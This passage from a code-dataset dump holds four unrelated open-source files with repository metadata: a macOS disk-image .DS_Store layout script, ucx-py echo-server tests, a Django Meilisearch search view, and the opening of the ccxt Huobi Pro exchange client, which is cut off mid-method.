] | null | null | null | contrib/macdeploy/custom_dsstore.py | VeriConomy/Verium | c3534ab37a173328a152c1e5c13df83e458d3c24 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07verium\x00\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00veriumuser:\x00Documents:\x00verium:\x00verium:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/veriumuser/Documents/verium/verium/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['Verium-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 61.766667 | 1,820 | 0.723691 |
a4464a943ed2deb0b600e940a1d286456d4da3aa | 5,837 | py | Python | tests/test_send_recv.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 76 | 2019-06-08T04:03:39.000Z | 2022-01-07T20:34:23.000Z | tests/test_send_recv.py | rapidsai/ucx-py | e28d770aa0b47c0e63c2e7e61649f1b355560e8a | [
"BSD-3-Clause"
] | 644 | 2019-06-04T23:06:02.000Z | 2022-02-24T11:17:45.000Z | tests/test_send_recv.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 32 | 2019-08-14T09:22:02.000Z | 2022-01-21T20:17:50.000Z | import functools
import pytest
import ucp
np = pytest.importorskip("numpy")
msg_sizes = [2 ** i for i in range(0, 25, 4)]
dtypes = ["|u1", "<i8", "f8"]
def make_echo_server(create_empty_data):
"""
Returns an echo server that calls the function `create_empty_data(nbytes)`
to create the data container.`
"""
async def echo_server(ep):
"""
Basic echo server for sized messages.
We expect the other endpoint to follow the pattern::
# size of the real message (in bytes)
>>> await ep.send(msg_size)
>>> await ep.send(msg) # send the real message
>>> await ep.recv(responds) # receive the echo
"""
msg_size = np.empty(1, dtype=np.uint64)
await ep.recv(msg_size)
msg = create_empty_data(msg_size[0])
await ep.recv(msg)
await ep.send(msg)
await ep.close()
return echo_server
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_bytes(size, blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
msg = bytearray(b"m" * size)
msg_size = np.array([len(msg)], dtype=np.uint64)
listener = ucp.create_listener(make_echo_server(lambda n: bytearray(n)))
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
await client.send(msg_size)
await client.send(msg)
resp = bytearray(size)
await client.recv(resp)
assert resp == msg
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("dtype", dtypes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_numpy(size, dtype, blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
msg = np.arange(size, dtype=dtype)
msg_size = np.array([msg.nbytes], dtype=np.uint64)
listener = ucp.create_listener(
make_echo_server(lambda n: np.empty(n, dtype=np.uint8))
)
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
await client.send(msg_size)
await client.send(msg)
resp = np.empty_like(msg)
await client.recv(resp)
np.testing.assert_array_equal(resp, msg)
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("dtype", dtypes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_cupy(size, dtype, blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
cupy = pytest.importorskip("cupy")
msg = cupy.arange(size, dtype=dtype)
msg_size = np.array([msg.nbytes], dtype=np.uint64)
listener = ucp.create_listener(
make_echo_server(lambda n: cupy.empty((n,), dtype=np.uint8))
)
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
await client.send(msg_size)
await client.send(msg)
resp = cupy.empty_like(msg)
await client.recv(resp)
np.testing.assert_array_equal(cupy.asnumpy(resp), cupy.asnumpy(msg))
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("dtype", dtypes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_numba(size, dtype, blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
cuda = pytest.importorskip("numba.cuda")
ary = np.arange(size, dtype=dtype)
msg = cuda.to_device(ary)
msg_size = np.array([msg.nbytes], dtype=np.uint64)
listener = ucp.create_listener(
make_echo_server(lambda n: cuda.device_array((n,), dtype=np.uint8))
)
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
await client.send(msg_size)
await client.send(msg)
resp = cuda.device_array_like(msg)
await client.recv(resp)
np.testing.assert_array_equal(np.array(resp), np.array(msg))
@pytest.mark.asyncio
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_error(blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
async def say_hey_server(ep):
await ep.send(bytearray(b"Hey"))
await ep.close()
listener = ucp.create_listener(say_hey_server)
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
msg = bytearray(100)
with pytest.raises(
ucp.exceptions.UCXMsgTruncated,
match=r"length mismatch: 3 \(got\) != 100 \(expected\)",
):
await client.recv(msg)
@pytest.mark.asyncio
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_obj(blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
async def echo_obj_server(ep):
obj = await ep.recv_obj()
await ep.send_obj(obj)
await ep.close()
listener = ucp.create_listener(echo_obj_server)
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
msg = bytearray(b"hello")
await client.send_obj(msg)
got = await client.recv_obj()
assert msg == got
@pytest.mark.asyncio
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_obj_numpy(blocking_progress_mode):
ucp.init(blocking_progress_mode=blocking_progress_mode)
allocator = functools.partial(np.empty, dtype=np.uint8)
async def echo_obj_server(ep):
obj = await ep.recv_obj(allocator=allocator)
await ep.send_obj(obj)
await ep.close()
listener = ucp.create_listener(echo_obj_server)
client = await ucp.create_endpoint(ucp.get_address(), listener.port)
msg = bytearray(b"hello")
await client.send_obj(msg)
got = await client.recv_obj(allocator=allocator)
assert msg == got
| 32.608939 | 78 | 0.708583 |
965947a822d570e99792770294ad15d48fdadf3f | 3,570 | py | Python | zoo/globalsearch/views.py | aexvir/the-zoo | 7816afb9a0a26c6058b030b4a987c73e952d92bd | [
"MIT"
] | 90 | 2018-11-20T10:58:24.000Z | 2022-02-19T16:12:46.000Z | zoo/globalsearch/views.py | kiwicom/the-zoo | fee0108ea7b65112e5b572a146cff4b1c54033fd | [
"MIT"
] | 348 | 2018-11-21T09:22:31.000Z | 2021-11-03T13:45:08.000Z | zoo/globalsearch/views.py | aexvir/the-zoo | 7816afb9a0a26c6058b030b4a987c73e952d92bd | [
"MIT"
] | 11 | 2018-12-08T18:42:07.000Z | 2021-02-21T06:27:58.000Z | from math import ceil
import structlog
from django.apps import apps
from django.views.generic import TemplateView
from .meili_client import meili_client
log = structlog.get_logger()
class GlobalSearchView(TemplateView):
template_name = "search_overview.html"
context_object_name = "context"
meili_limit = 20
@staticmethod
def _objects_from_result(search_results, index, result_objects=None):
try:
model = apps.get_model(index["uid"], index["name"])
for result in search_results:
key = index["name"].lower()
if key not in result_objects.keys():
result_objects[key] = []
result_objects[key].append(model.objects.get(pk=result["id"]))
except LookupError:
for result in search_results:
result_objects[index["name"].lower()].append(result["id"])
return result_objects
def _search(self, search_query, index_type, offset=0, limit=meili_limit):
objects_to_return = {}
new_offset, total_hits = 0, 0
indexes = meili_client.get_indexes()
for index in indexes:
results = meili_client.get_index(index["uid"]).search(
query=search_query, opt_params={"offset": offset, "limit": limit}
)
objects_to_return[f"total_{index['name'].lower()}"] = results["nbHits"]
if index_type == index["uid"]:
new_offset = results["offset"]
total_hits = results["nbHits"]
objects_for_index = self._objects_from_result(
results["hits"], index, objects_to_return
)
objects_to_return.update(objects_for_index)
return objects_to_return, new_offset, total_hits
def convert_meili_to_pages(self, total_hits, offset, limit=meili_limit):
if total_hits < limit:
return {
"total_pages": 1,
"current_page": 1,
"next_page": None,
"previous_page": None,
}
total_pages = ceil(total_hits / limit)
current_page = ceil((offset + limit) / limit)
next_page = None if total_pages == current_page else current_page + 1
previous_page = None if next_page == 1 else current_page - 1
return {
"total_pages": total_pages,
"current_page": current_page,
"next_page": next_page,
"previous_page": previous_page,
}
def convert_page_to_offset(self, page, limit=meili_limit):
return int((page * limit) - limit)
def get_context_data(self, **kwargs):
context_data = super().get_context_data(**kwargs)
if "q" in self.request.GET:
results, offset, total_hits = self._search(
search_query=self.request.GET["q"],
index_type=self.request.GET.get("t", "services"),
offset=self.convert_page_to_offset(
int(self.request.GET.get("page", 1))
),
)
context_data.update(results)
context_data["search_query"] = self.request.GET["q"]
context_data["search_type"] = self.request.GET.get("t", "services")
context_data["pagination"] = self.convert_meili_to_pages(total_hits, offset)
context_data["project_links"] = [
"Support",
"Repository",
"Dashboard",
"Alerts",
"Documentation",
]
return context_data
| 36.060606 | 88 | 0.585994 |
412cc350f91926b11214a936caeba1d04eff9918 | 61,023 | py | Python | python/ccxt/huobipro.py | Cyril45/ccxt | 4bd1fd9d35cd54cd71cb546288ab43d0e1586218 | [
"MIT"
] | null | null | null | python/ccxt/huobipro.py | Cyril45/ccxt | 4bd1fd9d35cd54cd71cb546288ab43d0e1586218 | [
"MIT"
] | null | null | null | python/ccxt/huobipro.py | Cyril45/ccxt | 4bd1fd9d35cd54cd71cb546288ab43d0e1586218 | [
"MIT"
] | 1 | 2021-05-14T22:47:10.000Z | 2021-05-14T22:47:10.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NetworkError
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
from ccxt.base.errors import RequestTimeout
from ccxt.base.decimal_to_precision import TRUNCATE
class huobipro(Exchange):
def describe(self):
return self.deep_extend(super(huobipro, self).describe(), {
'id': 'huobipro',
'name': 'Huobi Pro',
'countries': ['CN'],
'rateLimit': 2000,
'userAgent': self.userAgents['chrome39'],
'version': 'v1',
'accounts': None,
'accountsById': None,
'hostname': 'api.huobi.pro', # api.testnet.huobi.pro
'pro': True,
'has': {
'cancelOrder': True,
'CORS': False,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
'fetchTradingLimits': True,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '60min',
'4h': '4hour',
'1d': '1day',
'1w': '1week',
'1M': '1mon',
'1y': '1year',
},
'urls': {
'test': {
'market': 'https://api.testnet.huobi.pro',
'public': 'https://api.testnet.huobi.pro',
'private': 'https://api.testnet.huobi.pro',
},
'logo': 'https://user-images.githubusercontent.com/1294454/76137448-22748a80-604e-11ea-8069-6e389271911d.jpg',
'api': {
'market': 'https://{hostname}',
'public': 'https://{hostname}',
'private': 'https://{hostname}',
'v2Public': 'https://{hostname}',
'v2Private': 'https://{hostname}',
},
'www': 'https://www.huobi.com',
'referral': 'https://www.huobi.com/en-us/topic/invited/?invite_code=rwrd3',
'doc': 'https://huobiapi.github.io/docs/spot/v1/cn/',
'fees': 'https://www.huobi.com/about/fee/',
},
'api': {
'v2Public': {
'get': [
'reference/currencies',
],
},
'v2Private': {
'get': [
'account/ledger',
'account/withdraw/quota',
'account/withdraw/address', # 提币地址查询(限母用户可用)
'account/deposit/address',
'reference/transact-fee-rate',
'account/asset-valuation', # 获取账户资产估值
'point/account', # 点卡余额查询
'sub-user/user-list', # 获取子用户列表
'sub-user/user-state', # 获取特定子用户的用户状态
'sub-user/account-list', # 获取特定子用户的账户列表
'sub-user/deposit-address', # 子用户充币地址查询
'sub-user/query-deposit', # 子用户充币记录查询
'user/api-key', # 母子用户API key信息查询
],
'post': [
'point/transfer', # 点卡划转
'sub-user/management', # 冻结/解冻子用户
'sub-user/creation', # 子用户创建
'sub-user/tradable-market', # 设置子用户交易权限
'sub-user/transferability', # 设置子用户资产转出权限
'sub-user/api-key-generation', # 子用户API key创建
'sub-user/api-key-modification', # 修改子用户API key
'sub-user/api-key-deletion', # 删除子用户API key
],
},
'market': {
'get': [
'history/kline', # 获取K线数据
'detail/merged', # 获取聚合行情(Ticker)
'depth', # 获取 Market Depth 数据
'trade', # 获取 Trade Detail 数据
'history/trade', # 批量获取最近的交易记录
'detail', # 获取 Market Detail 24小时成交量数据
'tickers',
],
},
'public': {
'get': [
'common/symbols', # 查询系统支持的所有交易对
'common/currencys', # 查询系统支持的所有币种
'common/timestamp', # 查询系统当前时间
'common/exchange', # order limits
'settings/currencys', # ?language=en-US
],
},
'private': {
'get': [
'account/accounts', # 查询当前用户的所有账户(即account-id)
'account/accounts/{id}/balance', # 查询指定账户的余额
'account/accounts/{sub-uid}',
'account/history',
'cross-margin/loan-info',
'margin/loan-info', # 查询借币币息率及额度
'fee/fee-rate/get',
'order/openOrders',
'order/orders',
'order/orders/{id}', # 查询某个订单详情
'order/orders/{id}/matchresults', # 查询某个订单的成交明细
'order/orders/getClientOrder',
'order/history', # 查询当前委托、历史委托
'order/matchresults', # 查询当前成交、历史成交
'dw/withdraw-virtual/addresses', # 查询虚拟币提现地址(Deprecated)
'query/deposit-withdraw',
'margin/loan-info',
'margin/loan-orders', # 借贷订单
'margin/accounts/balance', # 借贷账户详情
'cross-margin/loan-orders', # 查询借币订单
'cross-margin/accounts/balance', # 借币账户详情
'points/actions',
'points/orders',
'subuser/aggregate-balance',
'stable-coin/exchange_rate',
'stable-coin/quote',
],
'post': [
'account/transfer', # 资产划转(该节点为母用户和子用户进行资产划转的通用接口。)
'futures/transfer',
'order/batch-orders',
'order/orders/place', # 创建并执行一个新订单(一步下单, 推荐使用)
'order/orders/submitCancelClientOrder',
'order/orders/batchCancelOpenOrders',
'order/orders', # 创建一个新的订单请求 (仅创建订单,不执行下单)
'order/orders/{id}/place', # 执行一个订单 (仅执行已创建的订单)
'order/orders/{id}/submitcancel', # 申请撤销一个订单请求
'order/orders/batchcancel', # 批量撤销订单
'dw/balance/transfer', # 资产划转
'dw/withdraw/api/create', # 申请提现虚拟币
'dw/withdraw-virtual/create', # 申请提现虚拟币
'dw/withdraw-virtual/{id}/place', # 确认申请虚拟币提现(Deprecated)
'dw/withdraw-virtual/{id}/cancel', # 申请取消提现虚拟币
'dw/transfer-in/margin', # 现货账户划入至借贷账户
'dw/transfer-out/margin', # 借贷账户划出至现货账户
'margin/orders', # 申请借贷
'margin/orders/{id}/repay', # 归还借贷
'cross-margin/transfer-in', # 资产划转
'cross-margin/transfer-out', # 资产划转
'cross-margin/orders', # 申请借币
'cross-margin/orders/{id}/repay', # 归还借币
'stable-coin/exchange',
'subuser/transfer',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.002,
'taker': 0.002,
},
},
'exceptions': {
'exact': {
# err-code
'bad-request': BadRequest,
'api-not-support-temp-addr': PermissionDenied, # {"status":"error","err-code":"api-not-support-temp-addr","err-msg":"API withdrawal does not support temporary addresses","data":null}
'timeout': RequestTimeout, # {"ts":1571653730865,"status":"error","err-code":"timeout","err-msg":"Request Timeout"}
'gateway-internal-error': ExchangeNotAvailable, # {"status":"error","err-code":"gateway-internal-error","err-msg":"Failed to load data. Try again later.","data":null}
'account-frozen-balance-insufficient-error': InsufficientFunds, # {"status":"error","err-code":"account-frozen-balance-insufficient-error","err-msg":"trade account balance is not enough, left: `0.0027`","data":null}
'invalid-amount': InvalidOrder, # eg "Paramemter `amount` is invalid."
'order-limitorder-amount-min-error': InvalidOrder, # limit order amount error, min: `0.001`
'order-limitorder-amount-max-error': InvalidOrder, # market order amount error, max: `1000000`
'order-marketorder-amount-min-error': InvalidOrder, # market order amount error, min: `0.01`
'order-limitorder-price-min-error': InvalidOrder, # limit order price error
'order-limitorder-price-max-error': InvalidOrder, # limit order price error
'order-orderstate-error': OrderNotFound, # canceling an already canceled order
'order-queryorder-invalid': OrderNotFound, # querying a non-existent order
'order-update-error': ExchangeNotAvailable, # undocumented error
'api-signature-check-failed': AuthenticationError,
'api-signature-not-valid': AuthenticationError, # {"status":"error","err-code":"api-signature-not-valid","err-msg":"Signature not valid: Incorrect Access key [Access key错误]","data":null}
'base-record-invalid': OrderNotFound, # https://github.com/ccxt/ccxt/issues/5750
'base-symbol-trade-disabled': BadSymbol, # {"status":"error","err-code":"base-symbol-trade-disabled","err-msg":"Trading is disabled for self symbol","data":null}
'base-symbol-error': BadSymbol, # {"status":"error","err-code":"base-symbol-error","err-msg":"The symbol is invalid","data":null}
'system-maintenance': OnMaintenance, # {"status": "error", "err-code": "system-maintenance", "err-msg": "System is in maintenance!", "data": null}
# err-msg
'invalid symbol': BadSymbol, # {"ts":1568813334794,"status":"error","err-code":"invalid-parameter","err-msg":"invalid symbol"}
'symbol trade not open now': BadSymbol, # {"ts":1576210479343,"status":"error","err-code":"invalid-parameter","err-msg":"symbol trade not open now"}
},
},
'options': {
# https://github.com/ccxt/ccxt/issues/5376
'fetchOrdersByStatesMethod': 'private_get_order_orders', # 'private_get_order_history' # https://github.com/ccxt/ccxt/pull/5392
'fetchOpenOrdersMethod': 'fetch_open_orders_v1', # 'fetch_open_orders_v2' # https://github.com/ccxt/ccxt/issues/5388
'createMarketBuyOrderRequiresPrice': True,
'fetchMarketsMethod': 'publicGetCommonSymbols',
'fetchBalanceMethod': 'privateGetAccountAccountsIdBalance',
'createOrderMethod': 'privatePostOrderOrdersPlace',
'language': 'en-US',
},
'commonCurrencies': {
# https://github.com/ccxt/ccxt/issues/6081
# https://github.com/ccxt/ccxt/issues/3365
# https://github.com/ccxt/ccxt/issues/2873
'GET': 'Themis', # conflict with GET(Guaranteed Entrance Token, GET Protocol)
'HOT': 'Hydro Protocol', # conflict with HOT(Holo) https://github.com/ccxt/ccxt/issues/4929
# https://github.com/ccxt/ccxt/issues/7399
# https://coinmarketcap.com/currencies/pnetwork/
# https://coinmarketcap.com/currencies/penta/markets/
# https://en.cryptonomist.ch/blog/eidoo/the-edo-to-pnt-upgrade-what-you-need-to-know-updated/
'PNT': 'Penta',
},
})
def fetch_trading_limits(self, symbols=None, params={}):
# self method should not be called directly, use loadTradingLimits() instead
# by default it will try load withdrawal fees of all currencies(with separate requests)
# however if you define symbols = ['ETH/BTC', 'LTC/BTC'] in args it will only load those
self.load_markets()
if symbols is None:
symbols = self.symbols
result = {}
for i in range(0, len(symbols)):
symbol = symbols[i]
result[symbol] = self.fetch_trading_limits_by_id(self.market_id(symbol), params)
return result
def fetch_trading_limits_by_id(self, id, params={}):
request = {
'symbol': id,
}
response = self.publicGetCommonExchange(self.extend(request, params))
#
# {status: "ok",
# data: { symbol: "aidocbtc",
# 'buy-limit-must-less-than': 1.1,
# 'sell-limit-must-greater-than': 0.9,
# 'limit-order-must-greater-than': 1,
# 'limit-order-must-less-than': 5000000,
# 'market-buy-order-must-greater-than': 0.0001,
# 'market-buy-order-must-less-than': 100,
# 'market-sell-order-must-greater-than': 1,
# 'market-sell-order-must-less-than': 500000,
# 'circuit-break-when-greater-than': 10000,
# 'circuit-break-when-less-than': 10,
# 'market-sell-order-rate-must-less-than': 0.1,
# 'market-buy-order-rate-must-less-than': 0.1 }}
#
return self.parse_trading_limits(self.safe_value(response, 'data', {}))
def parse_trading_limits(self, limits, symbol=None, params={}):
#
# { symbol: "aidocbtc",
# 'buy-limit-must-less-than': 1.1,
# 'sell-limit-must-greater-than': 0.9,
# 'limit-order-must-greater-than': 1,
# 'limit-order-must-less-than': 5000000,
# 'market-buy-order-must-greater-than': 0.0001,
# 'market-buy-order-must-less-than': 100,
# 'market-sell-order-must-greater-than': 1,
# 'market-sell-order-must-less-than': 500000,
# 'circuit-break-when-greater-than': 10000,
# 'circuit-break-when-less-than': 10,
# 'market-sell-order-rate-must-less-than': 0.1,
# 'market-buy-order-rate-must-less-than': 0.1 }
#
return {
'info': limits,
'limits': {
'amount': {
'min': self.safe_float(limits, 'limit-order-must-greater-than'),
'max': self.safe_float(limits, 'limit-order-must-less-than'),
},
},
}
def cost_to_precision(self, symbol, cost):
return self.decimal_to_precision(cost, TRUNCATE, self.markets[symbol]['precision']['cost'], self.precisionMode)
def fetch_markets(self, params={}):
method = self.options['fetchMarketsMethod']
response = getattr(self, method)(params)
markets = self.safe_value(response, 'data')
numMarkets = len(markets)
if numMarkets < 1:
raise NetworkError(self.id + ' publicGetCommonSymbols returned empty response: ' + self.json(markets))
result = []
for i in range(0, len(markets)):
market = markets[i]
baseId = self.safe_string(market, 'base-currency')
quoteId = self.safe_string(market, 'quote-currency')
id = baseId + quoteId
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'amount-precision'),
'price': self.safe_integer(market, 'price-precision'),
'cost': self.safe_integer(market, 'value-precision'),
}
maker = 0 if (base == 'OMG') else 0.2 / 100
taker = 0 if (base == 'OMG') else 0.2 / 100
minAmount = self.safe_float(market, 'min-order-amt', math.pow(10, -precision['amount']))
maxAmount = self.safe_float(market, 'max-order-amt')
minCost = self.safe_float(market, 'min-order-value', 0)
state = self.safe_string(market, 'state')
active = (state == 'online')
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'precision': precision,
'taker': taker,
'maker': maker,
'limits': {
'amount': {
'min': minAmount,
'max': maxAmount,
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': minCost,
'max': None,
},
},
'info': market,
})
return result
def parse_ticker(self, ticker, market=None):
#
# fetchTicker
#
# {
# "amount": 26228.672978342216,
# "open": 9078.95,
# "close": 9146.86,
# "high": 9155.41,
# "id": 209988544334,
# "count": 265846,
# "low": 8988.0,
# "version": 209988544334,
# "ask": [9146.87, 0.156134],
# "vol": 2.3822168242201668E8,
# "bid": [9146.86, 0.080758],
# }
#
# fetchTickers
# {
# symbol: "bhdht",
# open: 2.3938,
# high: 2.4151,
# low: 2.3323,
# close: 2.3909,
# amount: 628.992,
# vol: 1493.71841095,
# count: 2088,
# bid: 2.3643,
# bidSize: 0.7136,
# ask: 2.4061,
# askSize: 0.4156
# }
#
symbol = None
if market is not None:
symbol = market['symbol']
timestamp = self.safe_integer(ticker, 'ts')
bid = None
bidVolume = None
ask = None
askVolume = None
if 'bid' in ticker:
if isinstance(ticker['bid'], list):
bid = self.safe_float(ticker['bid'], 0)
bidVolume = self.safe_float(ticker['bid'], 1)
else:
bid = self.safe_float(ticker, 'bid')
bidVolume = self.safe_value(ticker, 'bidSize')
if 'ask' in ticker:
if isinstance(ticker['ask'], list):
ask = self.safe_float(ticker['ask'], 0)
askVolume = self.safe_float(ticker['ask'], 1)
else:
ask = self.safe_float(ticker, 'ask')
askVolume = self.safe_value(ticker, 'askSize')
open = self.safe_float(ticker, 'open')
close = self.safe_float(ticker, 'close')
change = None
percentage = None
average = None
if (open is not None) and (close is not None):
change = close - open
average = self.sum(open, close) / 2
if (close is not None) and (close > 0):
percentage = (change / open) * 100
baseVolume = self.safe_float(ticker, 'amount')
quoteVolume = self.safe_float(ticker, 'vol')
vwap = self.vwap(baseVolume, quoteVolume)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': bid,
'bidVolume': bidVolume,
'ask': ask,
'askVolume': askVolume,
'vwap': vwap,
'open': open,
'close': close,
'last': close,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': average,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'type': 'step0',
}
response = self.marketGetDepth(self.extend(request, params))
#
# {
# "status": "ok",
# "ch": "market.btcusdt.depth.step0",
# "ts": 1583474832790,
# "tick": {
# "bids": [
# [9100.290000000000000000, 0.200000000000000000],
# [9099.820000000000000000, 0.200000000000000000],
# [9099.610000000000000000, 0.205000000000000000],
# ],
# "asks": [
# [9100.640000000000000000, 0.005904000000000000],
# [9101.010000000000000000, 0.287311000000000000],
# [9101.030000000000000000, 0.012121000000000000],
# ],
# "ts":1583474832008,
# "version":104999698780
# }
# }
#
if 'tick' in response:
if not response['tick']:
raise BadSymbol(self.id + ' fetchOrderBook() returned empty response: ' + self.json(response))
tick = self.safe_value(response, 'tick')
timestamp = self.safe_integer(tick, 'ts', self.safe_integer(response, 'ts'))
result = self.parse_order_book(tick, timestamp)
result['nonce'] = self.safe_integer(tick, 'version')
